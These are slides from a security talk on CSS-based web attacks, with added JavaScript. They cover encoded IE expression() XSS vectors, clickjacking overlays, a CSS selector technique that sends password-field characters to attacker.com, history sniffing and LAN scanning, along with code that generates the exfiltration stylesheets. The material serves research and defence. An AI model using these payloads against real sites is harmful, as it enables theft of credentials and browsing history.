The Sexy Assassin
Tactical Exploitation using CSS
CSS Presentation Overview
Old Attacks
New Research
New Attacks
Old Attacks - reloaded
Known attacks using CSS
XSS using CSS - Impact
Session riding/hijacking attack
Steal page data content
Exploit BoF/HoF/memory corruption/etc. vulnerabilities in the browser
All other XSS threats
Expression XSS
CSS values can be escaped with backslashes, and IE still evaluates the expression:
<div style=xss:e\xp\re\s\s\i\o\n(alert(1))></div>
The backslashes can then be further encoded with hex/decimal entities (browsers accept them without the trailing semicolon):
<div style=xss:e&#92xp&#92re&#92s&#92s&#92i&#92o&#92n(alert(1))></div>
Following the CSS specification you can encode the whole expression with hex escapes:
<div style=xss:\65\78\70\72\65\73\73\69\6f\6e\28\61\6c\65\72\74\28\31\29\29></div>
Expression XSS continued
We can also entity-encode the previous vector:
<div style=xss:&#92&#54&#53&#92&#55&#56&#92&#55&#48&#92&#55&#50&#92&#54&#53&#92&#55&#51&#92&#55&#51&#92&#54&#57&#92&#54&#102&#92&#54&#101&#92&#50&#56&#92&#54&#49&#92&#54&#99&#92&#54&#53&#92&#55&#50&#92&#55&#52&#92&#50&#56&#92&#51&#49&#92&#50&#57&#92&#50&#57></div>
External style sheet tricks
• Expressions can be executed in external style sheets
• We can encode the vector
• We can also encode the content
Importing expressions from a XSS file
<style>@\69\6d\70\6f\72\74 'xss.css';</style>
How can we encode the content of a style sheet?
<style>@import 'utf.css';</style>
UTF-7 Expression
UTF-7 encoded style sheet:
@charset "UTF-7";
+ACoAIAB7AHgAcwBzADoAZQB4AHAAcgBlAHMAcwBpAG8AbgAoAGEAbABlAHIAdAAoADEAKQApAH0
Which produces:
* {xss:expression(alert(1))}
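The encodings above only work because the browser decodes them before the CSS value is compared with anything, so a filter that looks for the literal string "expression(" never sees it. The following is an added example, not code from the presentation: a small Node.js normaliser that undoes numeric HTML entities, CSS backslash escapes and UTF-7 (for an imported sheet carrying @charset "UTF-7") and then checks for expression(. The function names are mine; the inputs are the vectors from the slides above.

```javascript
// Added example (not from the presentation): normalise a style value the
// way the browser does before looking for IE's expression().

// Numeric HTML entities. The vectors above omit the trailing semicolon,
// which browsers tolerate, so the ';' is optional here too.
function decodeEntities(s) {
  return s.replace(/&#x([0-9a-f]+);?|&#(\d+);?/gi, (m, hex, dec) =>
    String.fromCodePoint(hex !== undefined ? parseInt(hex, 16) : parseInt(dec, 10)));
}

// CSS backslash escapes (CSS 2.1 section 4.1.3): "\" + 1-6 hex digits is a
// code point and swallows ONE following whitespace character; "\" before
// any other character stands for that character ("\x" -> "x").
function decodeCssEscapes(s) {
  return s.replace(/\\([0-9a-f]{1,6})[ \t\r\n\f]?|\\([^\r\n\f])/gi, (m, hex, ch) =>
    hex !== undefined ? String.fromCodePoint(parseInt(hex, 16)) : ch);
}

// UTF-7: "+<base64 of UTF-16BE>-" blocks; "+-" is a literal "+", and a
// block may also end at the first non-base64 character or at end of input.
function decodeUtf7(s) {
  return s.replace(/\+([A-Za-z0-9+\/]*)-?/g, (m, b64) => {
    if (b64 === '') return '+';
    const bytes = Buffer.from(b64, 'base64');   // Node.js; tolerates missing padding
    let out = '';
    for (let i = 0; i + 1 < bytes.length; i += 2) {
      out += String.fromCharCode((bytes[i] << 8) | bytes[i + 1]);
    }
    return out;
  });
}

// Order matters: the HTML parser decodes entities before the CSS parser
// ever sees the backslashes, so entities are undone first.
function normalizeStyle(styleValue) {
  return decodeCssEscapes(decodeEntities(styleValue));
}

function containsExpression(styleValue) {
  return /expression\s*\(/i.test(normalizeStyle(styleValue));
}

// The four inline vectors from the slides, verbatim.
const VECTORS = [
  String.raw`xss:e\xp\re\s\s\i\o\n(alert(1))`,
  'xss:e&#92xp&#92re&#92s&#92s&#92i&#92o&#92n(alert(1))',
  String.raw`xss:\65\78\70\72\65\73\73\69\6f\6e\28\61\6c\65\72\74\28\31\29\29`,
  'xss:&#92&#54&#53&#92&#55&#56&#92&#55&#48&#92&#55&#50&#92&#54&#53&#92&#55&#51&#92&#55&#51&#92&#54&#57&#92&#54&#102&#92&#54&#101&#92&#50&#56&#92&#54&#49&#92&#54&#99&#92&#54&#53&#92&#55&#50&#92&#55&#52&#92&#50&#56&#92&#51&#49&#92&#50&#57&#92&#50&#57',
];

// The UTF-7 external sheet from the slide (utf.css).
const UTF7_SHEET = '@charset "UTF-7";\n+ACoAIAB7AHgAcwBzADoAZQB4AHAAcgBlAHMAcwBpAG8AbgAoAGEAbABlAHIAdAAoADEAKQApAH0';
```

All four VECTORS normalise to xss:expression(alert(1)), and decodeUtf7(UTF7_SHEET) yields the @charset line followed by * {xss:expression(alert(1))}. One caveat worth remembering when writing such a normaliser: the single whitespace after a hex escape is part of the escape, so @\69\6d\70\6f\72\74 'xss.css' decodes to @import'xss.css' with no space, which the CSS tokenizer still accepts.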
CSS Overlays (clickjacking)
CSS Overlays (clickjacking) Definition:
Convincing the user to click something, and using that click to do something else (bad things).
CSS Overlays description
[Diagram: the attacker page shows a "Click here to continue" button; the original web page is loaded in an iframe positioned so that its real button sits exactly under the decoy.]
CSS Overlays advanced attacks
• Multiple iframes nested
• Using offsets to gather a piece of a target site
• No opacity, filled white div regions
• Single sign on services vulnerable
• Combined JavaScript and CSS tricks to intercept a click; impossible to know until it's too late
CSS Overlays advanced attacks
Verisign case study
An iframe performs a login request on the site (ficlets.com):
<form action="http://ficlets.com/signin/openid.signin" method="post" id="openid-form" target="iframe">
<input type="hidden" name="openid" id="openid-url" class="text-field" value="openidtester.pip.verisignlabs.com" />
</form>
ficlets.com connects to Verisign provider
CSS Overlays advanced attacks
Verisign case study cont.
OpenID provider (Verisign) is now in our iframe
CSS Overlays advanced attacks
Verisign case study cont.
Using multiple iframes and div offsets we can cover the other areas with solid colours and position the target area wherever we like.
CSS Overlays advanced attacks
Verisign case study cont.
• Opacity can be used, but solid fills make the attack harder to protect against at the browser level
• Referer checking can neuter the attack, but the header is not always available and the check is not implemented on most sites
• The Referer can be faked
• David Ross' idea: a "clickjacket", a user (accessibility) style sheet which uses expressions to display a hover popup that appears above other elements.
CSS Overlays Workarounds
Someone -> iframe-breaker
In some browsers (IE) JS can be disabled (iframebreaker-breaker)
NoScript -> Opacity disabled on remote iframes and embedded content.
CSS overlays that don't require opacity still work.
Michal Zalewski -> click only if not obstructed
Some no-opacity overlay attacks still work against it.
Mozilla -> Delayed disabled-buttons.
Still exploitable
David Ross -> X-I-Don't-Wanna-Be-Iframed-Please
Old browsers and websites still vulnerable.
Exploiting clickjacking defenses
• iframe hover state can be intercepted
• No way to tell if you're hovering over an external site
• Clicks can then be transferred to the iframe when a user clicks
<html>
<head>
</head>
<body>
<image ISMAP style="position:absolute;width:100%;height:100%;" onmousedown="this.style.display='none'">
<iframe src="http://www.microsoft.com" id=x type=text/html width=500 height=500 codetype=text/html></iframe></image>
</body>
</html>
Exploiting clickjacking defenses
• Image intercepts the hover state
• Image is hidden onmousedown
• The click is transferred to the iframe because the mousedown state is used; on mouseup we're already in the iframe
More clickjacking defenses
• My extension to David Ross' click jacket
• Full metal click jacket
• CSS accessible style sheet is used to override browser defaults with !important.
iframe,frame,object,applet {
border:1px solid #000 !important;
visibility:visible !important;
opacity: 1 !important;
filter: alpha(opacity=100) !important;
position:absolute !important;
float:none !important;
overflow:auto !important;
....
}
More clickjacking defenses
Advantages:
• Object styles are locked
• User can see clearly that it is a external site
• Javascript and CSS modification of styles have no effect
Disadvantages:
• Manuel Caballero hacked it :)
• Parent element allows opacity modification
More clickjacking defenses
Browser level CSS locks could prevent attacks
Advantages:
• Hard for an attacker to exploit if external objects are clearly visible and above everything else
Disadvantages:
• Designers would complain about limiting design ideas
• External objects would look ugly
• Could break existing sites
New Research
Algorithms
Arithmetics & Memory
- Check out Demos on http://p42.us/css
How:
element:condition{
action;
}
element: anything
condition: :visited, :active, :hover, :selected, etc.
action: background (remote request), display, opacity, visibility.
Loops
- Check out Demos on http://p42.us/css
Recalc of style:
- META refreshes
<meta http-equiv="refresh" content="0;URL=#1">
- -moz-binding
*{-moz-binding:url("remote-req#id")}
- webkit proposed CSS based animations (not very useful)
@keyframes{}
Server Side Interaction
- Check out Demos on http://p42.us/css
Use HTML+XML data loading (just IE or just FFx)
MSIE HTC files, XML DATAFLD
moz-binding
Meta refreshes + stylesheet update (it's not cross-browser)
<meta http-equiv="refresh" content="0">
Async stylesheet loading (doesn't work in strict mode)
<element>
<style>@import "//url1";</style>
<style>@import "//url2";</style>
Multiple iframe loading (works everywhere)
<iframe src="site.com/"></iframe>
<iframe src="site.com//"></iframe>
New attacks
Attacks possible thanks to the "theory"
CSS HTML Attribute Reader
How to read HTML attributes using CSS, without JavaScript.
CSS HTML Attribute Reader
Advanced CSS3 Attribute Selectors:
For matching:
<input type="password" value="savedpassword"/>
• input{}
– Matches all inputs.
• input[type]{}
– Matches all inputs with an attribute "type".
• input[type="password"]{}
– Matches all inputs of type "password".
CSS HTML Attribute Reader
Advanced CSS3 Attribute Selectors:
For matching:
<input type="password" value="savedpassword"/>
• input[type*="swor"]{}
– Matches all input elements whose type attribute contains "swor" (anywhere)
• input[type^="pass"]{}
– Matches all inputs whose type attribute starts with "pass"
• input[type$="word"]{}
– Matches all inputs whose type attribute ends with "word"
CSS HTML Attribute Reader
Attempt to read an attribute with the [=] selector, with the help of the [*=] selector!
First calculate the range of the chars in the value (\x10 here is the slide's notation for the character with code 0x10; in a real stylesheet that is the CSS escape \10 followed by a space):
input[value*="\x10"]{
background:url("//attacker.com/?h=\x10");
}
…
111 different variations
…
input[value*="\x7F"]{
background:url("//attacker.com/?h=\x7F");
}
CSS HTML Attribute Reader – Try 3
To calculate the first letter, if we assume from the previous step that the range is [uiopasdf]:
input[value^=“u”]{
background:url(“//attacker.com/?s=u”);
}
…
and so, 8 questions... u,i,o,p,a,s,d,f
…
input[value^=“f”]{
background:url(“//attacker.com/?s=f”);
}
CSS HTML Attribute Reader – Try 3
Once we found the first char (let’s say it was
d) we continue with [uiopasf] :
input[value^=“du”]{
background:url(“//attacker.com/?s=du”);
}
…
and so, 7 questions... u,i,o,p,a,s,f
…
input[value^=“df”]{
background:url(“//attacker.com/?s=df”);
}
CSS HTML Attribute Reader – Try 3
And so on. If we assume a known attribute length, but allow for repeats:
111+N^2 CSS rules
In the worst case for 8 chars: 175 CSS rules
In the worst case for 50 chars: 2,611 CSS rules
CSS HTML Attribute Reader
We can optimize this more, but at an implementation level.
First, we can use the [^=] and [$=] selectors at the same time, learning one character from each end per round and halving the number of rounds (stylesheet updates).
CSS HTML Attribute Reader
1. Detect the range
2. Detect first char and eighth char
3. Detect second char and seventh char
4. Detect third char and sixth char
5. Detect fourth char and fifth char
6. Confirm we have the correct string
CSS HTML Attribute Reader
Demo:
- Async stylesheet load attribute reader (read the contents of a text field without JS)
http://eaea.sirdarckcat.net/cssar/
Parallel discovery by Stefano Di Paola (WiSec) with
111*N complexity (888 rules for 8 chars)
http://www.wisec.it/
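To see the rule budget and the prefix/suffix interleaving concretely, here is an added example (not the presentation's code, nor the demo linked above) that simulates the whole procedure in Node.js. The victim's browser is replaced by selectorFires(), which implements the matching semantics of [value*=], [value^=], [value$=] and [value=]; attacker.example and the query parameter names are placeholders; and the candidate alphabet is assumed to be printable ASCII (0x20-0x7E, 95 characters) rather than the slides' 0x10-0x7F. Everything else, the range stage, the two-ended extension with repeats allowed, and the final exact-match confirmation, follows the six stages above.

```javascript
// Added example (not from the presentation): simulate the CSS attribute
// reader end to end. The browser is emulated by selectorFires().

// Assumption: the secret is printable ASCII (the slides probe 0x10-0x7F).
const CANDIDATES = Array.from({ length: 0x7e - 0x20 + 1 },
  (_, i) => String.fromCharCode(0x20 + i));

// Hex-escape every character for use inside a quoted selector string; the
// trailing space terminates each escape so "\31 0" is not read as "\310".
function cssEscape(str) {
  return Array.from(str, ch => '\\' + ch.charCodeAt(0).toString(16) + ' ').join('');
}

// One probe rule. If the selector matches, the browser requests the URL and
// the attacker's server learns which probe fired.
function probeRule(op, arg, param) {
  const beacon = '//attacker.example/?' + param + '=' + encodeURIComponent(arg); // placeholder host
  return 'input[value' + op + '"' + cssEscape(arg) + '"]{background:url("' + beacon + '")}';
}

// Browser emulation: does input[value OP "arg"] match an input with this value?
// (An empty string never matches for *=, ^= and $=, as in CSS Selectors.)
function selectorFires(value, op, arg) {
  switch (op) {
    case '*=': return arg !== '' && value.includes(arg);
    case '^=': return arg !== '' && value.startsWith(arg);
    case '$=': return arg !== '' && value.endsWith(arg);
    case '=':  return value === arg;
    default:   throw new Error('unsupported operator ' + op);
  }
}

// Run the whole procedure against `secret`, whose length the attacker
// believes to be `len`. Returns the recovered value, whether the final
// exact-match probe confirmed it, the number of rules shipped, and the
// stylesheet itself.
function readAttribute(secret, len) {
  const rules = [];
  const ask = (op, arg, param) => {        // ship one rule, observe the beacon
    rules.push(probeRule(op, arg, param));
    return selectorFires(secret, op, arg);
  };

  // Stage 1: which characters occur at all ("detect the range").
  const present = CANDIDATES.filter(c => ask('*=', c, 'h'));

  // Stages 2-5: extend a prefix (^=) and a suffix ($=) in the same round,
  // so two characters are learned per round. Every present character is
  // retried each round, which is what allows repeated characters.
  let prefix = '', suffix = '';
  while (prefix.length + suffix.length < len) {
    let nextPrefix = null, nextSuffix = null;
    for (const c of present) {
      if (ask('^=', prefix + c, 's')) nextPrefix = prefix + c;
      if (ask('$=', c + suffix, 'e')) nextSuffix = c + suffix;
    }
    if (nextPrefix === null) { suffix = ''; break; } // prefix already is the whole value: len was overestimated
    prefix = nextPrefix;
    suffix = nextSuffix;
  }

  // Stage 6: the two halves overlap when len is odd (the loop ran past the
  // middle); drop the overlap and confirm with an exact-match rule.
  const overlap = Math.max(0, prefix.length + suffix.length - len);
  const value = prefix + suffix.slice(overlap);
  const confirmed = ask('=', value, 'c');
  return { value, confirmed, rules: rules.length, stylesheet: rules.join('\n') };
}
```

readAttribute('password', 8) recovers the value with 95 + 4*14 + 1 = 152 rules (95 range probes, four rounds of 7 present characters times two ends, one confirmation), which is the same shape as the slide's 111+N^2 bound with the two-ended optimisation applied. The stylesheet property holds the exact CSS that would be served, so the output can be dropped into a test page to check a real browser against the emulation.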
-1day (0Day-1) - Cross Site Styling
HTML5 describes seamless iframes.
So HTML attribute reading would be a vulnerability in a not-yet-implemented standard!
These will inherit all styles of the parent document (cross origin).
CSS will read content cross-origin!
Call for Microsoft's guys in the W3C HTML5 WG:
Stop this! Make it same-origin only ;)
<style>@import "exploit";</style>
<iframe src="victim" seamless="seamless"/>
CSS History Hacks
Attacks based on the ability of CSS to read the browser's history.
Visited boolean
Cross-browser
<style>
a:visited{background:url(//visited)}
a:not(:visited){background:url(//not-visited)}
</style>
<a href="http://website/">&nbsp;</a>
Impact Privacy
Counter-measures
Firefox: SafeHistory addon
IE: Disable history
Demo: http://ha.ckers.org/weird/CSS-history.cgi
CSS LAN Scanner
PoC:
How it works:
Error pages don't create a log in the history.
If a website is valid, then it is marked as visited.
The scanner just visits a lot of LAN IPs, and checks if they were marked as visited.
[Diagram: attacker.com, the victim's browser, and the victim's LAN intranet containing 10.3.22.111 (a private web service) and 192.168.1.254 (the router's configuration page).]
Victim visits attacker.com.
attacker.com tries to open a lot of local IP addresses in iframes; most will fail.
attacker.com then asks which websites appear as visited, and so, those IPs are up.
The victim responds to the attacker with the visited IPs.
attacker.com then tries to guess the service on those IPs based on ports, and if necessary, the content of remote stylesheets.
attacker.com then sends CSRF attacks against the detected software behind the LAN.
CSSH - CSS Stealing Some History
History Crawler + Navigation Monitoring!
CSSH - History Crawler
[Diagram: attacker.com and the victim, with a list of candidate sites: digg.com, twitter.com, slashdot.org, hi5.com, myspace, google news, msn.com, del.icio.us, live.com, sla.ckers.org, Redtube, facebook.]
attacker.com shows a lot of possible websites that the user may have visited.
The victim responds to the attacker with the websites visited.
The attacker fetches the links of those websites (Link #1 ... Link #6), and asks which ones are visited.
The victim responds, and the exploit asks again endlessly.
This way we can effectively crawl the commonly visited websites of a user.
The privacy implications of this are huge.
This attack is not a secret; it was described in Mozilla's bug tracker by Paul Stone:
https://bugzilla.mozilla.org/show_bug.cgi?id=147777#c78
CSSH - Navigation Monitoring
What if...
We could detect in real time the navigation of a user using our history crawler?
Might this be possible?
Yes
[Diagram: attacker, victim, and the sites the victim navigates to (digg.com, then cnn.com).]
Victim visits attacker.com.
attacker.com sends the exploit to the user, and opens digg.com.
The exploit detects that digg.com was visited, so it alerts attacker.com, and attacker.com fetches the links on digg.com.
Then the attacker updates the exploit, and starts asking for each link whether any of them are visited.
When the user finally clicks on a link, the exploit detects it, and alerts attacker.com.
attacker.com fetches all links on cnn.com, and updates the exploit asking whether they were visited.
Repeat the above steps indefinitely.
Public Demo:
http://eaea.sirdarckcat.net/cssh-mon/
Cross-browser.
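As an added example (not the presentation's code, nor the demo above), the crawl loop of the History Crawler and the repeated step of Navigation Monitoring as a Node.js simulation. The victim's a:visited oracle is modelled by a function that answers whether a URL is in a constructed history set, the link graph is constructed inline, and attacker.example is a placeholder beacon host; in the real attack the oracle's answers arrive as the background-image requests triggered by the stylesheet that probeStylesheet() builds.

```javascript
// Added example (not from the presentation): simulate the CSSH history
// crawler and navigation monitor. The a:visited oracle and the link graph
// below are constructed stand-ins for the victim's browser and the web.

// Markup the attacker serves for one batch of candidate URLs: every visited
// link fires one beacon request that identifies the URL by its index.
function probeStylesheet(urls, beacon) {
  const css = urls.map((u, i) => 'a#l' + i + ':visited{background:url("' + beacon + '?v=' + i + '")}');
  const links = urls.map((u, i) => '<a id="l' + i + '" href="' + u.replace(/"/g, '&quot;') + '">&nbsp;</a>');
  return '<style>\n' + css.join('\n') + '\n</style>\n' + links.join('\n');
}

// History crawler: probe the seeds, fetch the links of every page that was
// visited (the attacker fetches them from its own server, so no same-origin
// restriction applies), probe those, and repeat until nothing new shows up.
function crawlHistory(seeds, fetchLinks, oracle, beacon, maxProbes) {
  const visited = [], asked = new Set(), stylesheets = [];
  let frontier = seeds.slice();
  while (frontier.length > 0 && asked.size < maxProbes) {
    const batch = Array.from(new Set(frontier)).filter(u => !asked.has(u));
    if (batch.length === 0) break;
    batch.forEach(u => asked.add(u));
    stylesheets.push(probeStylesheet(batch, beacon));   // one stylesheet update per round
    frontier = [];
    for (const u of batch) {
      if (!oracle(u)) continue;                         // no beacon came back: not visited
      visited.push(u);
      for (const link of fetchLinks(u)) if (!asked.has(link)) frontier.push(link);
    }
  }
  return { visited, probes: asked.size, rounds: stylesheets.length, stylesheets };
}

// Navigation monitoring: the same step, repeated on a timer against the links
// of the page the user is currently on. Each call reports the links that
// became visited since the last call and moves the frontier to that page.
function monitorStep(state, fetchLinks, oracle) {
  const clicked = state.frontier.filter(u => !state.seen.has(u) && oracle(u));
  for (const u of clicked) {
    state.seen.add(u);
    state.frontier = fetchLinks(u);
  }
  return clicked;
}

// Constructed link graph (not real site content).
const LINKS = {
  'http://digg.com/':     ['http://cnn.com/', 'http://example.org/story/1', 'http://example.org/story/2'],
  'http://twitter.com/':  ['http://example.net/a'],
  'http://slashdot.org/': ['http://example.net/b'],
  'http://cnn.com/':      ['http://cnn.com/world', 'http://example.org/story/1'],
  'http://cnn.com/world': ['http://cnn.com/'],
};
const fetchLinks = u => LINKS[u] || [];

// Constructed browsing history for the crawler scenario.
const HISTORY = new Set(['http://digg.com/', 'http://cnn.com/', 'http://cnn.com/world', 'http://example.org/story/1']);
const SEEDS = ['http://digg.com/', 'http://twitter.com/', 'http://slashdot.org/'];

function runCrawl() {
  return crawlHistory(SEEDS, fetchLinks, u => HISTORY.has(u), '//attacker.example/b', 100); // placeholder host
}

// Monitoring scenario: the history grows as the user clicks; each tick is
// one poll of the exploit page.
function runMonitor() {
  const live = new Set(['http://digg.com/']);
  const state = { seen: new Set(['http://digg.com/']), frontier: fetchLinks('http://digg.com/') };
  const ticks = [];
  ticks.push(monitorStep(state, fetchLinks, u => live.has(u)));   // nothing clicked yet
  live.add('http://cnn.com/');                                    // user clicks cnn.com
  ticks.push(monitorStep(state, fetchLinks, u => live.has(u)));
  live.add('http://cnn.com/world');                               // user clicks cnn.com/world
  ticks.push(monitorStep(state, fetchLinks, u => live.has(u)));
  return ticks;
}
```

runCrawl() finds the four visited URLs in three rounds with seven probes in total, because only pages that answered "visited" have their links fetched; runMonitor() returns nothing on the first poll, then cnn.com, then cnn.com/world, which is the sequence the slides describe. The maxProbes argument exists because the real loop would otherwise run for as long as the victim keeps the tab open.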
Thanks
We would like to thank:
Bluehat team, David Ross, Robert Hansen,
Jeremiah Grossman, Giorgio Maone, Alex K,
David Lenoe (Adobe PSIRT), Google Sec. Team,
Stefano DiPaola, and everyone else that assisted our research in any way.